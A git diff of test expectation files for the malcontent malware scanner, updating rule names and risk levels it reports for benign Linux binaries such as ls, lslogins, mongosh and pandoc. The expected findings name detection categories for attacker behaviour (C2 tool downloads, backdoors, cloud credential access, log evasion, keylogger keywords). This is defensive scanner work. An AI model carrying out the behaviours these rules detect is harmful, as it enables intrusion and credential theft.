@@ -18,8 +18,9 @@ data/hash/sha1: low
 data/hash/sha256: low
 data/hash/whirlpool: medium
 discover/network/interface_list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/process/name: medium
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
@@ -50,7 +51,6 @@ fs/path/var: low
 fs/permission/modify: medium
 fs/proc/arbitrary_pid: medium
 fs/proc/mounts: medium
-fs/proc/pid_exe: high
 fs/proc/stat: medium
 fs/tempdir: low
 fs/tempdir/TEMP: low
@@ -82,7 +82,6 @@ net/url/embedded: low
 net/url/encode: medium
 net/url/parse: low
 process/multithreaded: low
-process/name_get: medium
 sus/exclamation: medium
 sus/intercept: medium
 sus/leetspeak: medium
diff --git a/tests/linux/clean/libsystemd.so.0.simple b/tests/linux/clean/libsystemd.so.0.simple
index 3800798c7..a45fb292c 100644
--- a/tests/linux/clean/libsystemd.so.0.simple
+++ b/tests/linux/clean/libsystemd.so.0.simple
@@ -1,8 +1,10 @@
 # linux/clean/libsystemd.so.0: medium
 data/compression/lzma: low
 data/random/insecure: low
+discover/process/parent: low
+discover/process/runtime_deps: medium
 discover/user/USER: low
-evasion/hidden_paths/var_run: medium
+evasion/file/location/var_run: medium
 exec/program: medium
 exec/shell/TERM: low
 fs/file/copy: medium
@@ -36,6 +38,4 @@ process/groups_set: low
 process/multithreaded: low
 process/name_set: medium
 process/namespace_set: low
-process/parent_pid_get: low
-process/thread_local_storage: low
 process/userid_set: low
diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md
index fe3d4731f..ab48ef8b6 100644
--- a/tests/linux/clean/ls.x86_64.md
+++ b/tests/linux/clean/ls.x86_64.md
@@ -1,11 +1,11 @@ ## linux/clean/ls.x86_64 [🟡 MEDIUM] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | -| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | -| LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | -| LOW | 
[fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | +| LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | +| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | +| LOW | 
[fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | diff --git a/tests/linux/clean/lslogins.md b/tests/linux/clean/lslogins.md index c668064d7..ede252252 100644 --- a/tests/linux/clean/lslogins.md +++ b/tests/linux/clean/lslogins.md 
@@ -1,11 +1,11 @@ -## linux/clean/lslogins [🛑 HIGH] +## linux/clean/lslogins [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|--------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [evasion/logging/historical_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/historical_logins.yara#login_records) | accesses historical login records | 
[/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code) | | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [evasion/logging/failed_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/failed_logins.yara#failed_logins) | accesses failed logins | [/var/log/btmp](https://github.com/search?q=%2Fvar%2Flog%2Fbtmp&type=code) | +| MEDIUM | [evasion/logging/historical_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/historical_logins.yara#login_records) | accesses historical login records | [/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code) | | MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/zlib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fzlib%2Flib&type=code) |
 | MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./include](https://github.com/search?q=.%2Finclude&type=code) |
 | MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/](https://github.com/search?q=%2Ftmp%2F&type=code) |
diff --git a/tests/linux/clean/melange.simple b/tests/linux/clean/melange.simple
index a17f603f6..65688de3f 100644
--- a/tests/linux/clean/melange.simple
+++ b/tests/linux/clean/melange.simple
@@ -36,17 +36,18 @@ discover/network/interface_list: medium
 discover/network/mac_address: medium
 discover/network/netstat: medium
 discover/processes/pgrep: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/se: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/location/system_directory: medium
+evasion/file/prefix: medium
 evasion/hide_artifacts/pivot_root: medium
-evasion/hide_artifacts/system_directories: medium
 exec/cmd: medium
 exec/install_additional/pip_install: medium
 exec/plugin: low
diff --git a/tests/linux/clean/misp_sample.ndjson.log.simple b/tests/linux/clean/misp_sample.ndjson.log.simple
index eedc03a76..2e8742a3d 100644
--- a/tests/linux/clean/misp_sample.ndjson.log.simple
+++ b/tests/linux/clean/misp_sample.ndjson.log.simple
@@ -1,12 +1,12 @@
-# linux/clean/misp_sample.ndjson.log: critical
+# linux/clean/misp_sample.ndjson.log: high
 3P/threat_hunting/pastebin: medium
 c2/addr/ip: medium
 c2/tool_transfer/download: high
 crypto/aes: low
+evasion/rootkit/refs: high
 exec/shell/command: medium
 false-positives/filebeat: low
 impact/ransom/decryptor: medium
-impact/remote_access/backdoor: high
-impact/rootkit/refs: high
+impact/remote_access/backdoor: medium
 net/url/embedded: medium
 os/fd/multiplex: low
diff --git a/tests/linux/clean/mongosh.simple b/tests/linux/clean/mongosh.simple
index 0bf8f2dd6..a2450ed9f 100644
--- a/tests/linux/clean/mongosh.simple
+++ b/tests/linux/clean/mongosh.simple
@@ -4,9 +4,8 @@ anti-static/obfuscation/hex: medium
 anti-static/obfuscation/obfuscate: low
 c2/addr/http_dynamic: medium
 c2/addr/ip: medium
-c2/addr/url: high
+c2/addr/server: medium
 c2/discovery/ip_dns_resolver: medium
-c2/server_address: medium
 collect/archives/unarchive: medium
 collect/databases/postgresql: medium
 collect/databases/sqlite: medium
@@ -37,18 +36,20 @@ data/random/insecure: low
 discover/cloud/aws_metadata: low
 discover/cloud/google_metadata: low
 discover/group/lookup: medium
-discover/network/interface_get: low
+discover/network/interface: low
 discover/network/interface_list: medium
 discover/network/mac_address: medium
+discover/process/name: medium
+discover/process/parent: low
 discover/processes/list: medium
-discover/system/hostname_get: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/info: medium
 discover/user/name_get: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 evasion/logging/acct: low
 exec/cmd: medium
 exec/conditional/LANG: low
@@ -160,9 +161,7 @@ process/create: low
 process/groupid_set: low
 process/groups_set: low
 process/multithreaded: low
-process/name_get: medium
 process/namespace_set: low
-process/parent_pid_get: low
 process/terminate: medium
 process/terminate/taskkill: medium
 process/userid_set: low
diff --git a/tests/linux/clean/nvim.simple b/tests/linux/clean/nvim.simple
index 3f1bafa25..7d856fd17 100644
--- a/tests/linux/clean/nvim.simple
+++ b/tests/linux/clean/nvim.simple
@@ -1,7 +1,6 @@
 # linux/clean/nvim: medium
 3P/threat_hunting/hrshell: medium
 c2/addr/server: medium
-c2/server_address: medium
 collect/databases/mysql: medium
 collect/databases/sqlite: medium
 credential/cloud/aws: medium
@@ -16,8 +15,8 @@ discover/processes/pgrep: medium
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/x11: low
+evasion/file/location/x11_unix: low
+evasion/file/prefix: medium
 exec/conditional/LANG: low
 exec/dylib/symbol_address: medium
 exec/plugin: low
diff --git a/tests/linux/clean/opa.simple b/tests/linux/clean/opa.simple
index 360cb7418..255d5ee87 100644
--- a/tests/linux/clean/opa.simple
+++ b/tests/linux/clean/opa.simple
@@ -22,8 +22,8 @@ data/encoding/json_encode: low
 data/hash/md5: low
 discover/cloud/aws_metadata: low
 discover/cloud/google_metadata: low
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/system/sysinfo: medium
 discover/user/USER: low
diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md
index fd1071a42..27105d8cd 100644
--- a/tests/linux/clean/pandoc.md
+++ b/tests/linux/clean/pandoc.md
@@ -6,8 +6,8 @@ | MEDIUM | [3P/threat_hunting/keylogger](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#keylogger_keyword_offensive_tool_keyword) | [references 'keylogger keyword' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [KeyLogger](https://github.com/search?q=KeyLogger&type=code) | | MEDIUM | [3P/threat_hunting/slowloris](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#SlowLoris_offensive_tool_keyword) | [references 'SlowLoris' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [Slowloris](https://github.com/search?q=Slowloris&type=code) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bindPort](https://github.com/search?q=bindPort&type=code)
[blIp](https://github.com/search?q=blIp&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[client_port](https://github.com/search?q=client_port&type=code)
[config_port](https://github.com/search?q=config_port&type=code)
[curlopt_port](https://github.com/search?q=curlopt_port&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[domain_port](https://github.com/search?q=domain_port&type=code)
[eIp](https://github.com/search?q=eIp&type=code)
[ereghet_ip](https://github.com/search?q=ereghet_ip&type=code)
[framed_ip](https://github.com/search?q=framed_ip&type=code)
[ftp_port](https://github.com/search?q=ftp_port&type=code)
[gamhet_ip](https://github.com/search?q=gamhet_ip&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[gomphet_ip](https://github.com/search?q=gomphet_ip&type=code)
[host_ip](https://github.com/search?q=host_ip&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[internal_ip](https://github.com/search?q=internal_ip&type=code)
[ipproto_ip](https://github.com/search?q=ipproto_ip&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[lat_port](https://github.com/search?q=lat_port&type=code)
[lloghet_ip](https://github.com/search?q=lloghet_ip&type=code)
[lnormhet_ip](https://github.com/search?q=lnormhet_ip&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[local_port](https://github.com/search?q=local_port&type=code)
[login_ip](https://github.com/search?q=login_ip&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[nas_ip](https://github.com/search?q=nas_ip&type=code)
[nas_port](https://github.com/search?q=nas_port&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[pg_port](https://github.com/search?q=pg_port&type=code)
[primary_ip](https://github.com/search?q=primary_ip&type=code)
[primary_port](https://github.com/search?q=primary_port&type=code)
[proxyPort](https://github.com/search?q=proxyPort&type=code)
[radius_port](https://github.com/search?q=radius_port&type=code)
[sam_port](https://github.com/search?q=sam_port&type=code)
[serverPort](https://github.com/search?q=serverPort&type=code)
[server_port](https://github.com/search?q=server_port&type=code)
[setPort](https://github.com/search?q=setPort&type=code)
[socketPort](https://github.com/search?q=socketPort&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[uriPort](https://github.com/search?q=uriPort&type=code)
[url_port](https://github.com/search?q=url_port&type=code)
[validate_ip](https://github.com/search?q=validate_ip&type=code)
[weibhet_ip](https://github.com/search?q=weibhet_ip&type=code)
[xIp](https://github.com/search?q=xIp&type=code) | +| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [inet_server_addr](https://github.com/search?q=inet_server_addr&type=code) | | MEDIUM | [c2/discovery/dyndns](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/dyndns.yara#dynamic_dns_user) | dynamic dns user | [dyndns](https://github.com/search?q=dyndns&type=code) | -| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [inet_server_addr](https://github.com/search?q=inet_server_addr&type=code) | | MEDIUM | [collect/archives/unarchive](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/unarchive.yara#unarchive) | unarchives files | [unarchived](https://github.com/search?q=unarchived&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [ZIP64](https://github.com/search?q=ZIP64&type=code) | | MEDIUM | [collect/databases/mysql](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/mysql.yara#mysql) | accesses MySQL databases | [mysql](https://github.com/search?q=mysql&type=code) | @@ -20,8 +20,10 @@ | MEDIUM | [data/hash/whirlpool](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/whirlpool.yara#whirlpool) | [hash function often used for cryptomining](https://en.wikipedia.org/wiki/Whirlpool_(hash_function)) | [WHIRLPOOL](https://github.com/search?q=WHIRLPOOL&type=code) | | MEDIUM | [discover/group/lookup](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/group/lookup.yara#getgrent) | get entry from group database | [endgrent](https://github.com/search?q=endgrent&type=code)
[getgrent](https://github.com/search?q=getgrent&type=code)
[setgrent](https://github.com/search?q=setgrent&type=code) | | MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) | +| MEDIUM | [discover/process/egid](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/egid.yara#php_getmygid) | returns the effective group id of the current process | [getmygid](https://github.com/search?q=getmygid&type=code) | +| MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [CmdForListBodyStartCmd](https://github.com/search?q=CmdForListBodyStartCmd&type=code)
[SystemziProcess_runCommand1_closure](https://github.com/search?q=SystemziProcess_runCommand1_closure&type=code)
[SystemziProcess_runCommand1_info](https://github.com/search?q=SystemziProcess_runCommand1_info&type=code)
[SystemziProcess_runCommand2_closure](https://github.com/search?q=SystemziProcess_runCommand2_closure&type=code)
[SystemziProcess_runCommand3_bytes](https://github.com/search?q=SystemziProcess_runCommand3_bytes&type=code)
[SystemziProcess_runCommand_closure](https://github.com/search?q=SystemziProcess_runCommand_closure&type=code)
[SystemziProcess_runCommand_info](https://github.com/search?q=SystemziProcess_runCommand_info&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | 
@@ -67,12 +69,10 @@ | MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | | MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) | | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) | -| MEDIUM | [persist/cron/tab](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/cron/crontab.yara#crontab_support) | supports crontab manipulation | [crontab](https://github.com/search?q=crontab&type=code) | +| MEDIUM | [persist/cron/tab](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/cron/tab.yara#crontab_support) | supports crontab manipulation | [crontab](https://github.com/search?q=crontab&type=code) | | MEDIUM | [persist/kernel_module/module](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/kernel_module/module.yara#delete_module) | Unload Linux kernel module | [delete_module](https://github.com/search?q=delete_module&type=code) | | MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [PidFile](https://github.com/search?q=PidFile&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo](https://github.com/search?q=sudo&type=code) | -| MEDIUM | [process/effective_groupid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/effective-groupid-get.yara#php_getmygid) | returns the effective group id of the current process | 
[getmygid](https://github.com/search?q=getmygid&type=code) | -| MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [sec-tool/net/nmap](https://github.com/chainguard-dev/malcontent/blob/main/rules/sec-tool/net/nmap.yara#nmap) | nmap | [nmap](https://github.com/search?q=nmap&type=code) | | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept](https://github.com/search?q=intercept&type=code) | | LOW | [anti-static/obfuscation/obfuscate](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/obfuscate.yara#obfuscate) | Mentions the word obfuscate | [obfuscatedFont](https://github.com/search?q=obfuscatedFont&type=code)
[obfuscates](https://github.com/search?q=obfuscates&type=code) | @@ -89,8 +89,10 @@ | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) | -| LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | -| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | +| LOW | [discover/system/cpu](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | +| LOW | [discover/system/dmesg](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/dmesg.yara#dmesg) | accesses the kernel log ring buffer | [dmesg](https://github.com/search?q=dmesg&type=code) | +| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/system/machine_id](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/machine_id.yara#machineid) | Gets a unique machineid for the host | [machineid](https://github.com/search?q=machineid&type=code) | | LOW | 
[discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | @@ -151,7 +153,6 @@ | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | | LOW | [process/namespace_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/namespace-set.yara#setns) | associate thread or process with a namespace | [setns](https://github.com/search?q=setns&type=code) | -| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git 